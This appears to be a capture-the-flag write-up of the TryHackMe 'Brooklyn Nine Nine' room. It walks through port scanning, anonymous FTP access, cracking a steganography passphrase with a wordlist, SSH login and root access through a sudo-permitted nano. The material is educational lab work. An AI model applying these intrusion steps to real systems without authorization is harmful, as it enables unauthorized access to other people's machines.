Brooklyn Nine Nine Write Up



Brooklyn Nine Nine is a easy room on TryHackMe by Fsociety2006.


I deployed the machine and was given the target IP I started a NMAP scan to check the available ports.

└──╼ $sudo nmap -sC -sV -oN initial
[sudo] password for daz: 
Starting Nmap 7.80 ( https://nmap.org ) at 2021-01-01 14:26 GMT
Nmap scan report for
Host is up (0.070s latency).
Not shown: 997 closed ports
21/tcp open  ftp     vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r--    1 0        0             119 May 17  2020 note_to_jake.txt
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 3
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 16:7f:2f:fe:0f:ba:98:77:7d:6d:3e:b6:25:72:c6:a3 (RSA)
|   256 2e:3b:61:59:4b:c4:29:b5:e8:58:39:6f:6f:e9:9b:ee (ECDSA)
|_  256 ab:16:2e:79:20:3c:9b:0a:01:9c:8c:44:26:01:58:04 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.74 seconds

3 Ports open:

  • 21 - FTP - Anonymous log in allowed with a note
  • 22 - SSH - Banner is showing its an Ubuntu machine
  • 80 - HTTP - Apache web server version 2.4.29

I also ran a full port scan but no additional ports were found.


As the FTP service allows anonymous access I started by logging in with the username ‘anonymous’ and the password ‘anonymous’.

└──╼ $ftp
Connected to
220 (vsFTPd 3.0.3)
Name ( anonymous
331 Please specify the password.
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-r--r--    1 0        0             119 May 17  2020 note_to_jake.txt
226 Directory send OK.
ftp> get note_to_jake.txt
local: note_to_jake.txt remote: note_to_jake.txt
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for note_to_jake.txt (119 bytes).
226 Transfer complete.
119 bytes received in 0.03 secs (4.3601 kB/s)
ftp> ls -lah
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x    2 0        114          4096 May 17  2020 .
drwxr-xr-x    2 0        114          4096 May 17  2020 ..
-rw-r--r--    1 0        0             119 May 17  2020 note_to_jake.txt
226 Directory send OK.

I downloaded the note_to_jake.txt file but couldn’t find anything else. The note reads:

From Amy,

Jake please change your password. It is too weak and holt will be mad if someone hacks into the nine nine

The note indicates a weak password being used, I moved on to port 80 and looked at the web page.

<!DOCTYPE html>
<meta name="viewport" content="width=device-width, initial-scale=1">
body, html {
  height: 100%;
  margin: 0;

.bg {
  /* The image used */
  background-image: url("brooklyn99.jpg");

  /* Full height */
  height: 100%; 

  /* Center and scale the image nicely */
  background-position: center;
  background-repeat: no-repeat;
  background-size: cover;

<div class="bg"></div>

<p>This example creates a full page background image. Try to resize the browser window to see how it always will cover the full screen (when scrolled to top), and that it scales nicely on all screen sizes.</p>
<!-- Have you ever heard of steganography? -->

The page just displays an image of Brooklyn nine nine, however looking at the source provides a comment regarding steganography.

Initial Access

I downloaded the image and ran steghide however the I cant extract the data with out a password. I used StegSeek and the rockyou.txt word list to crack the password.

└──╼ $stegseek brooklyn99.jpg /usr/share/wordlists/rockyou.txt
StegSeek version 0.5
Progress: 0.00% (0 bytes)           

[i] --> Found passphrase: "<REDACTED>"
[i] Original filename: "note.txt"
[i] Extracting to "brooklyn99.jpg.out"
└──╼ $cat brooklyn99.jpg.out
Holts Password:


Great I now have some credentials. Using the credentials I can now SSH in to the machine.

└──╼ $ssh holt@
holt@'s password: 
Last login: Tue May 26 08:59:00 2020 from

Priv Esc

The privilege escalation was really simple, doing a sudo -l, all users can run /bin/nano without a password. Going to GTFOBins shows the steps required to abuse this and get root.

holt@brookly_nine_nine:~$ sudo -l
Matching Defaults entries for holt on brookly_nine_nine:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User holt may run the following commands on brookly_nine_nine:
    (ALL) NOPASSWD: /bin/nano

Following the steps, I get a root shell.

# id
uid=0(root) gid=0(root) groups=0(root)
# hostname
# cd /root
# ls

Thanks for reading!


Any comments or feedback welcome! You can find me on twitter.

Buy Me A Coffee